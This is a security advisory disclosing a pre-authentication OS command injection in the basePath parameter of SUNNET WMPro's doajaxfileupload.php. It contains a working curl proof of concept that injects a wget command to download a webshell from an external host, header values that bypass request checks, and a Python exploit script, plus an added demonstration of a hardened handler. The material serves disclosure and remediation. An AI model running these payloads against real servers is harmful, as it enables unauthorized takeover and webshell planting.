Pre-auth OS Command Injection on SUNNET WMPro

Current Description

WMPro v5.0 and v5.1 (an eLearning system) have an OS command injection vulnerability via "/teach/course/doajaxfileupload.php". This affects many eLearning systems of governments, organizations, companies and universities. The target server can be exploited without authentication.

Details

The injection point is the basePath parameter of "/teach/course/doajaxfileupload.php".

We execute OS commands via the basePath parameter without authentication: the value is spliced into a shell command line, so a value of the form ";<command>;" terminates the original command and appends ours.

Description

We can execute OS commands without authentication and upload a webshell to the target server.

Systems Affected

Target servers running the affected versions are compromised, with web shells uploaded.

Affected files

http://[Target Domain]/teach/course/doajaxfileupload.php

Proof of Concept

We use the wget command to download a remote webshell. Note that the "X-Http-Forwarded-For" and "User-Agent" headers must be set to bypass the script's request checking. URL-decoded, the POST body below is basePath=;wget 2522842207 -O webshell.php; (the download host is written as a decimal integer IP rather than dotted form).

curl -H "X-Http-Forwarded-For: 127.0.0.1" --user-agent "elearn is good" -d "basePath=%3Bwget+2522842207+%2dO+webshell.php%3B" -X POST http://Target_Domain/teach/course/doajaxfileupload.php
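As an added illustration (not code from this gist or from WMPro), the following Python shows what the curl body decodes to, how the PoC builds its ";command;" payload, and why splicing basePath into a shell command line is injectable, alongside a hardened form. The two handlers and the allow-list regex are hypothetical stand-ins for the vulnerable script, not the vendor's code.

```python
import re
import subprocess
from urllib.parse import parse_qs

# Body of the curl PoC; decoding it exposes the ';' that '%3B' hides.
CURL_BODY = "basePath=%3Bwget+2522842207+%2dO+webshell.php%3B"


def decode_body(body):
    """Return the raw basePath value carried in an x-www-form-urlencoded body."""
    return parse_qs(body, keep_blank_values=True)["basePath"][0]


def build_payload(cmd):
    """Same construction as the Python PoC: the first ';' closes the
    original command, the second separates ours from whatever follows."""
    return ";%s;" % cmd


# Hypothetical handler (NOT the WMPro source): stands in for a script that
# concatenates basePath into a shell command line. 'echo' is a harmless
# placeholder for whatever the real script ran with the path.
def vulnerable_handler(base_path):
    result = subprocess.run("echo " + base_path, shell=True,
                            capture_output=True, text=True)
    return result.stdout


# Hardened equivalent: allow-list the value, reject traversal, and pass it
# as an argument vector so no shell ever parses it.
_SAFE_PATH = re.compile(r"^[A-Za-z0-9_./-]+$")


def hardened_handler(base_path):
    if not _SAFE_PATH.match(base_path) or ".." in base_path.split("/"):
        raise ValueError("rejected basePath: %r" % base_path)
    result = subprocess.run(["echo", base_path], capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    print("decoded curl basePath:", decode_body(CURL_BODY))
    # the injected 'echo pwned' runs as a second shell command
    print("vulnerable:", repr(vulnerable_handler(build_payload("echo pwned"))))
    try:
        hardened_handler(build_payload("echo pwned"))
    except ValueError as exc:
        print("hardened:", exc)
```

Against the vulnerable handler the payload produces a second line of output ("pwned") from the injected command; the hardened handler refuses the same value before any process is started, and even a metacharacter that slipped past the allow-list would reach echo as literal text because the argument vector is never parsed by /bin/sh.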

PoC code:

import sys
import requests

# Usage: python poc.py http://Target_Domain
url = '%s/teach/course/doajaxfileupload.php' % sys.argv[1]

# Command whose output proves execution on the target
cmd = 'echo "`whoami` on `hostname` has been hacked! "'
# basePath is spliced into a shell command line: the leading ';' closes the
# original command, the trailing ';' separates ours from what follows
payload = ';%s;' % (cmd)
# Both headers are required to pass the script's request checking
res = requests.post(url, data=dict(basePath=payload),
                    headers={'User-Agent': 'elearn good',
                             'X-Http-Forwarded-For': '127.0.0.1'})
output = res.text
# Trim the response to its last block of lines, where the command output appears
line_count = len(output.split('\n'))
if line_count > 1:
    line_count = (line_count-1) // 6 + 1
print('\n'.join(output.split('\n')[-line_count:-1]))

Usage: python poc.py [Target Domain]

If the target is exploitable, the script prints "<whoami> on <hostname> has been hacked! " on the console, with the target's actual user name and host name.

Contributor

  • Tony Kuo (CHT Security)
  • Tree Chiu (CHT Security)